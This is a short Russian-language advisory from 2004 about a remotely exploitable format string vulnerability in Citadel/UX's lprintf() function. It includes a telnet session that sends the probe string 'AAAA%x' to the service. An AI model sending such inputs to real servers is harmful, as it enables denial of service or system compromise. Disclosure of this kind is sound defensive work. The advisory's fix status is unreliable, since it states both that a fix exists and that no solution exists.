Выполнение произвольного кода в Citadel/UX

Дата публикации:14.12.2004
Всего просмотров:987
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Citadel/UX 6.x
Уязвимые версии: Citadel/UX 6.27 и боле ранние версии

Описание:
Обнаружена уязвимость форматной строки в Citadel/UX. Удаленный атакующий может выполнить произвольный код на целевой системе.

Уязвимость обнаружена в функции lprintf() в модуле 'sysdep.c' из-за небезопасного вызова syslog().

Удаленный атакующий может подключиться к целевой службе, и с помощью специально сформированной строки вызвать отказ в обслуживании или выполнить произвольный код. Пример:

coki@nosystem:~/audit$ telnet localhost 504
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
200 nosystem Citadel server ready.
AAAA%x
530 Unrecognized or unsupported command.
quit
200 Goodbye.
Connection closed by foreign host.
coki@nosystem:~/audit$

URL производителя: www.citadel.org

Решение: Решение на данный момент не существует.

Ссылки: Citadel/UX Format String Error in lprintf() Lets Remote Users Execute Arbitrary Code